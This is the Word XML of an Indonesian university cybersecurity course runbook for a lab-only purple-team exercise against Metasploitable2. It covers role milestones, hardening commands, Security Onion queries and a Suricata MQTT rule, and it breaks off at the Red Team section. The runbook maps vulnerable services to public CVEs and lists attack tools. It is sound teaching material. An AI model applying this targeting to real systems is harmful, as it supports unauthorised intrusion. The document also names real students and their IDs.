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B6B4F"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PANDUAN PENGERJAAN PBL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123A5E"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Runbook Per Role — Fase 1 sampai Fase 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A6672"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Simulated SOC Engagement: Mengamankan Infrastruktur Backend Sistem IoT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="D5DED9"/>
        </w:pBd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098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540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Mata kuliah</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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TEK1314 Keamanan Siber — D4 Teknologi Rekayasa Komputer, SV IPB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Kelas / Kelompok</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="754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TEK-A / Kelompok 4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Subnet lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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192.168.4.0/24 (isolated lab, tanpa koneksi internet)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Target Node replika</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="754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192.168.4.5 — Metasploitable2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Attacker Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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192.168.4.100 — Kali Linux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Monitoring Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="754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192.168.4.200 — Security Onion 3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Repositori</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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github.com/anggi267/TEK1314-2026-Kel04-KelasA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="209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Acuan penilaian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="754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Panduan PBL Pertemuan 9, Bagian VII (kriteria), VIII (hardening), IX (attack plan), X (Purple Team Loop)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color w:val="123A5E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Anggota &amp; peran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9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Peran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Nama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1644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NIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="425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Tanggung jawab utama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Lead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Olan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(lihat lampiran)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Koordinasi, jadwal, verifikasi repo &amp; akses dosen, logbook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Blue Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Anggi Permana Putra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="164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J0404241154</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="425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Hardening, baseline, deteksi, analisis, mitigasi, Incident Report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Red Team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Raka Syauqi Ferdian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J0404241112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Rencana &amp; eksekusi serangan, dokumentasi bukti serangan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Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Zidan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="164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(lihat lampiran)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="425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Eksekusi serangan, perekaman bukti, analisis teknik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FF6E5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cara pakai: baca Bagian 1 (milestone) sekali sebagai tim, lalu tiap anggota cukup bekerja pada sub-bagian role-nya sendiri. Setiap langkah punya kolom "Bukti" — jika bukti belum ada, langkah belum boleh ditandai selesai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Peta Milestone Fase 1 – Fase 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Satu halaman ini adalah kontrak kerja tim: apa yang harus ada di repo pada tiap minggu, dan siapa yang bertanggung jawab menyelesaikannya.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850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Minggu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="624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2608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Fokus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Deliverable wajib</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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PIC utama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Pembentukan tim &amp; peran, aturan kerja</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Repo + pembagian role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F1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Instalasi CyberOps Workstation &amp; Security Onion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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VM hidup, screenshot instalasi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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Hardening &amp; audit dasar Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Catatan praktikum, hardening awal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F1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Perancangan arsitektur &amp; skema IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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docs/design/topology.png, ip_plan.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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 + Lead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Praktikum jaringan: routing, Wireshark, ACL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Laporan praktikum 4–6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 + Blue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F1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UTS praktikum &amp; UTS teori</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Lembar jawaban UTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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Checkpoint: presentasi rencana Fase 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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slides.pdf, tech stack, hardening checklist, attack plan, purple-team-log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F2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Baseline traffic + hardening prioritas + loop RT-01, RT-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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evidence/before, after, rt01, rt02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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 + Red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Loop RT-03, RT-04, RT-05 + tutup siklus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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purple-team-log.md lengkap, Vulnerability Assessment Report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 + Red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F3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Digital forensics &amp; draf Incident Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Incident Report (NIST SP 800-61r2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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IoT security awareness &amp; remediasi lanjutan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Catatan remediasi + materi awareness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F3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Gladi bersih &amp; video demo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Draf laporan akhir + video</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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Presentasi final + demo live</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Laporan final, artefak GitHub, video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E8F3EE"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Status per dokumen ini dibuat: Minggu 1–9 SELESAI (dokumen), Minggu 10–15 BELUM dieksekusi. Jangan menandai langkah selesai sebelum buktinya ada di repo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Fase 1 — Fondasi &amp; Baseline (Minggu 1–7, selesai)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Fase 1 sudah berjalan; bagian ini tetap ditulis agar (a) anggota baru bisa mengejar ketinggalan, dan (b) jelas fondasi mana yang dipakai ulang di Fase 2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Lead — Olan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24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2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368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Keluaran / cara verifikasi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Tetapkan tiga peran (Lead, Red, Blue) dan tulis di README repo.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README berisi tabel peran bernama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L2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Buat repo GitHub kelompok; tetapkan aturan commit deskriptif (bukan "update").</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Commit message bermakna, mis. "docs: add ip plan"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L3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Kunci subnet unik 192.168.4.0/24 sesuai kontrak kuliah dan pastikan tidak dipakai kelompok lain.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Tercatat di docs/design/ip_plan.md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L4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Jadwalkan sesi instalasi VM; pastikan tiap anggota punya salinan OVA/ISO.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Jadwal + daftar file instalasi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L5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Verifikasi deliverable Minggu 4 lengkap sebelum praktikum berikutnya.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topology.png + ip_plan.md ada di repo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L6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 kendala (RAM laptop, bentrok IP, VM gagal boot) beserta solusinya.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Tabel kendala di logbook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Blue Team — Anggi Permana Putra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24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2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368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Keluaran / cara verifikasi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Instal CyberOps Workstation (OVA) dan Security Onion (ISO 3.2.0) di laptop masing-masing / laptop utama.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VM boot, login berhasil (docs/Pertemuan 2)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 IP statis tiap node sesuai ip_plan (target .5, attacker .100, monitoring .200); uji ping antar node.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Ping berhasil dua arah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B3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Verifikasi sensor melihat trafik: buat ping dari Kali ke target, cek Zeek conn.log / tcpdump di Onion.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Screenshot conn.log berisi pasangan IP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B4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Hardening awal di target: ganti password default, aktifkan firewall dasar bila tersedia, matikan service yang jelas tidak perlu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Catatan perubahan + screenshot config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B5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Rekam baseline awal: daftar port terbuka, service berjalan, versi paket.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Output nmap/netstat tersimpan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B6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Susun draft checklist hardening A/B/C (baru berupa rencana pada Fase 1).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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docs/blueteam/hardening_checklist.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Red Team — Raka Syauqi Ferdian &amp; Zidan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24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2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368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Keluaran / cara verifikasi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Riset port &amp; service yang berpotensi dieksploitasi pada target (21, 22, 23, 80, 3306, 445, 8180).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Daftar port + alasan, dari hasil scan terkontrol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R2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Petakan versi service ke CVE publik (vsftpd 2.3.4, MySQL 5.0.51a, Samba 3.0.20, Apache 2.2.8).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Tabel service → CVE → dampak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R3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Serahkan daftar port &amp; catatan celah ke Blue Team sebagai masukan desain topologi (tugas role Minggu 4).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Komentar/commit yang merujuk daftar tersebut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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R4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Siapkan Kali: nmap, metasploit, hydra, sqlmap, hping3, mosquitto-clients.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Output "which" semua tool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R5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Uji konektivitas lab: ping &amp; nmap -sn (bukan scan penuh) untuk memastikan jalur siap.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Hasil ping/scan ringan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color w:val="123A5E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Deliverable Fase 1 yang dipakai ulang di Fase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Artefak Fase 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236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Dipakai untuk apa di Fase 2–3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docs/design/topology.png, ip_plan.md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dasar slide arsitektur + verifikasi penempatan sensor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Daftar port &amp; CVE hasil riset Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236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dasar penyusunan 5 skenario attack plan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Baseline port/service Blue Team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pembanding "before" pada checklist hardening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Catatan kendala (RAM, bentrok IP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236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dasar mitigasi risiko pada Bagian 6 dokumen ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Fase 2 — Deteksi &amp; Respons (Minggu 9–11)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Minggu 9 — checkpoint (sudah dilaksanakan)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24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697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 yang harus sudah selesai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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697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Susun deck 8 slide, tetapkan pembagian bicara 20 menit, commit slides.pdf sebelum sesi, verifikasi repo bisa dibuka dosen.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Selesai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697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Isi hardening checklist 10 kontrol (A/B/C) + skema bukti before/after + rencana baseline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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Selesai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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="697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Susun attack plan 5 skenario (4 kategori) dengan tools eksplisit + rules of engagement.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Selesai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  <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="697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Isi Deklarasi Tech Stack (pemetaan komponen IoT → replika) dan update logbook Minggu 1–9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="141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Selesai (produk IoT masih perlu dikonfirmasi)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FF6E5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Pekerjaan rumah sebelum Minggu 10: (1) push commit terakhir ke GitHub, (2) konfirmasi produk IoT asli kelompok agar tabel tech stack final, (3) pastikan ketiga VM bisa dinyalakan bersamaan atau tetapkan jadwal bergantian.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Blue Team — sesi S1: baseline &amp; hardening prioritas (150 menit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="9B2226"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Urutan di bawah ini tidak boleh ditukar: menerapkan firewall sebelum port SSH diizinkan akan mengunci kalian dari VM sendiri.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56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66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3628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Perintah / detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2778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 wajib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Snapshot VM target sebelum perubahan apa pun.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VirtualBox/VMware → Snapshot, nama snap-s1-&lt;tanggal&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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screenshot nama snapshot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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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Pastikan target &amp; sensor hidup, IP sesuai ip_plan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="362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ping 192.168.4.5 dari Kali &amp; Onion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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screenshot ping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B3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Rekam baseline normal 15 menit (tanpa serangan).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ping -i 5, 10x buka dashboard, query API tiap 10 s, tcpdump di sensor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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baseline_minggu9.pcap + baseline_summary.md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B4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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Jalankan perekam baseline otomatis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="362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sudo bash scripts/blueteam/01_rekam_baseline.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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evidence/before/00–07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B5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A-2: pasang SSH key, uji login key DULU sebelum mematikan password.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ssh-copy-id -i ~/.ssh/pbl_kel4.pub msfadmin@192.168.4.5 lalu login pakai -i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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A2_after_key_login_ok.png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B6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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A-2: matikan PasswordAuthentication; jangan tutup sesi SSH lama.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="362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sed -i + /etc/init.d/ssh restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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A2_after_password_login_denied.png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B7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A-3 (opsional): ganti port 22 → 2222.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sed -i s/^#*Port.*/Port 2222/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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A3_after_ssh_port2222_nmap.png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B8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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B-2: siapkan semua rule ufw SEBELUM enable (2222 wajib allow).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="362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ufw default deny incoming; ufw allow 2222/tcp; ufw allow 80/tcp; ufw --force enable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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B2_after_ufw_status.png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B9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Uji dari Kali: SSH masih bisa, port lain tertutup.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nmap -sS -p1-1024 192.168.4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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B2_before_nmap_vs_after_nmap.png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B10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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B-1: matikan service tak terpakai (telnet, rsh, tftp, smtp, ircd, distccd, tomcat).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="362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killall/update-rc.d -f remove sesuai checklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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B1_after_nmap_full.txt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B11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B-3: patch paket + ganti password root MySQL; JANGAN lupa update config DVWA.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mysqladmin -u root password; edit config/config.inc.php DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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B3_after_mysql_access_denied.png + dashboard masih hidup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B12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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C-1: pindahkan kredensial aplikasi ke .env (chmod 600).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="362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lihat checklist C-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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C1_after_env_file_chmod600.png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B13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Rekam kondisi after, update status checklist, commit.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sudo bash scripts/blueteam/02_rekam_after.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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commit "feat(blueteam): baseline + 5 hardening controls"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CEC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Pitfall yang paling sering menghabiskan waktu: (1) Metasploitable2 memakai Ubuntu 8.04 yang repositori apt-nya sudah EOL — "apt-get install ufw/fail2ban" bisa gagal. Bila gagal, ganti dengan iptables (default-deny + rate-limit) dan tulis jujur di checklist bahwa kontrolnya diimplementasikan dengan iptables, bukan ufw/fail2ban. (2) Mengganti password root MySQL tanpa memperbarui config DVWA akan mematikan dashboard — dan itu merusak skenario RT-03.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18"/>
        </w:rPr>
        <w:t>Contoh pengganti ufw/fail2ban bila apt EOL (jalankan sebagai root):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iptables -F; iptables -P INPUT DROP; iptables -P FORWARD DROP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iptables -A INPUT -i lo -j ACCEPT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iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT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iptables -A INPUT -p tcp --dport 80 -j ACCEPT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iptables -A INPUT -p tcp --dport 2222 -m state --state NEW -m recent --set --name SSH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iptables -A INPUT -p tcp --dport 2222 -m state --state NEW -m recent --update --seconds 600 --hitcount 4 --name SSH -j DROP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iptables -A INPUT -p tcp --dport 2222 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Blue Team — sesi S2–S5: deteksi, analisis, mitigasi, verifikasi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Pola tiap loop sama; yang berubah hanya query log dan kontrol yang ditambahkan. Jangan mengubah skenario; yang dinilai adalah siklus tertutupnya.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56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83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396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Detail operasional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268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Tahap 2 — deteksi: saring log pada rentang waktu serangan.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Security Onion → Hunt → event.dataset:conn and source.ip:192.168.4.100 (tambahkan destination.ip:192.168.4.5)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screenshot alert/log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B15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Jika TIDAK ada alert, catat sebagai temuan (bukan kegagalan).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Tulis query yang dicoba + hasil kosong di &lt;id&gt;_no_alert.md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file &lt;id&gt;_no_alert.md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Tahap 3 — analisis: jelaskan mengapa berhasil/gagal, kontrol mana yang kurang.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Isi kolom analisis di docs/purple-team-log.md (root cause, bukan gejala)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baris log terisi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B17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Tahap 4 — respons: tambahkan kontrol penutup sesuai tabel Bagian 7 attack plan.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Mis. RT-02 → matikan FTP (B-1) + blokir 21 (B-2) + upgrade vsftpd (B-3)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diff config sebelum/sesudah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B18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Commit perubahan sebelum Red menguji ulang.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git commit -m "feat(blueteam): block FTP after RT-02"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hash commit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B19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Tahap 5 — konfirmasi: minta Red mengulang skenario yang sama, lalu cocokkan hasil.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Serangan harus gagal/terblokir + alert tetap muncul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screenshot percobaan ulang gagal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RT-04 khusus: buat rule alert MQTT kustom (tidak ada signature bawaan).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Alert bila CONNECT/PUBLISH ke aktuator/# dari IP selain gateway 192.168.4.100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rule + screenshot alert menyala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B21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RT-05 khusus: aktifkan rate-limit per sumber + syncookies.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ufw limit 80/tcp atau iptables -m limit; sysctl -w net.ipv4.tcp_syncookies=1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output sysctl + curl tetap 200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 timeline insiden gaya NIST SP 800-61r2 tiap skenario.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Kolom: waktu deteksi, sumber, teknik, dampak, tindakan, status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draf Incident Report Minggu 12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18"/>
        </w:rPr>
        <w:t>Contoh kerangka rule Suricata untuk RT-04 (sesuaikan nomor sid &amp; threshold):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>alert tcp !192.168.4.100 any -&gt; 192.168.4.5 1883 (msg:"MQTT CONNECT/PUBLISH dari host tak berizin"; \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  flow:to_server,established; content:"|10|"; depth:1; classtype:attempted-admin; sid:4000001; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A6672"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Catatan: rule di atas menyaring byte pertama header MQTT (0x10 = CONNECT). Uji dulu di mode deteksi sebelum dijadikan alert produksi, dan dokumentasikan false positive-nya.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Red Team — Raka Syauqi Ferdian &amp; Zidan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
